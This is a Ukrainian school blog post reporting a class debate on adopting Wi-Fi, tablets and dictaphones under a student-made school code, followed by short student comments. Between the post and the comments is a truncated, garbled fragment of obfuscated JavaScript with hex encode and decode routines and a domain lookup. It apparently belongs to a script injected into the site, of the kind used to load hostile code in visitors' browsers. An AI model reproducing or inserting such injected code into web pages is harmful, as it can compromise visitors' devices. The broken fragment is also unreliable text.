Вносимо свої пропозиції до Кодексу (звіт про дебати в 11-Б класі)

Дебати в 11-Б класі проводилися в 2 етапи. Напередодні я розповіла учням про проект, основні принципи і завдання Класної школи. Кожен мав можливість обдумати і запропонувати ті новітні технології, які хотів би бачити в нашій школі, після чого ми працювали в парах і групах і визначили більшістю голосів 5 ІКТ,які допоможуть зробити нашу школу класною. Зміст ІІ етапу заключався в тому, щоб виявити всі плюси і мінуси наших пропозицій і виробити саме такі правила,які б дозволити реалізувати принципи Класної школи. Дискусія відбулася 9 листопада, нас було тільки восьмеро, але, я вважаю, робота була плідною.
Учні об’єдналися в дві групи, і кожна намагалася знайти якомога більше плюсів і мінусів запровадження запропонованих технологій в шкільний процес. Щоб було цікавіше, добавили трішки креативу. Серед багатьох пропозицій для обговорення ми обрали Wi-Fi, планшети та диктофони.
Перш за все, одноголосно було вирішено використовувати всі ІКТ лише з користю для свого навчання, з дозволу вчителя та не заходити на заборонені сайти (наприклад, ГДЗ або соціальні мережі).
“Я думаю, Класна школа – це дуже цікавий проект як для учнів, так і для вчителів. Але навіть правила, які ми придумуємо самі – не легкі; виконувати їх буде непросто”,- висловила свою думку одна з учасниць Войтович Наталя.
Напевно, найбільше суперечок виникало, коли звучали пропозиції поставити пароль на Wi-Fi. Участь кожного учня в обговоренні – це насправді дуже великий внесок в створення Кодексу. Я думаю, всі погодяться, що ми не тільки провели час весело і цікаво, а ще й з користю для кожного.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "klasnashkola.eu"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Share Button

8s коментарів

  1. Марічка

    Багато учнів кажуть,що в школі дуже нудно і тому не хочуть туди ходити.Так,я також така сама.Але я вважаю що завдяки таким проектам,як Класна школа шкільне життя стає цікавішим і різноманітнішим)А проведення дебатів було настільки захопливим,що я забула про все і хотіла прикласти всі сили щоб Кодекс вийшов змістовним)Я задоволена що наша школа бере участь у проекті Класна школа))

    Відповіcти
  2. Сергій

    Класна школа це дуже цікаво я радий що нпш клас взяв участь в цьмо

    Відповіcти
  3. Мар*яна

    Участь у цьому проекті буде корисною для нас усіх. Ми маємо можливість навчитися вільно спілкуватися та розуміти один одного. Ми самі повинні збудувати школу майбутнього! Я рада, що з*явився такий проект “Класна школа”. Сподіваюся, на нашу співпрацю)))

    Відповіcти

  4. Класна школа це перспективний проект для розвитку школи .Я сподівааюсь наша школа стане такою в майбутньому .

    Відповіcти
    1. natmarkus

      та у нас уже більше тижня триває процес практичного тестування і застосування положень Шкільного Кодексу ))) але вітання завжди приємні і актуальні)))

      Відповіcти

  5. Чудовий захід! Дуже добре,що кожен має свої пропозиції.За допомогою дебатів,школа стане кращою

    Відповіcти

Напишіть відгук

Ваша пошт@ не публікуватиметься. Обов’язкові поля позначені *

Можна використовувати XHTML теґи та атрибути: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>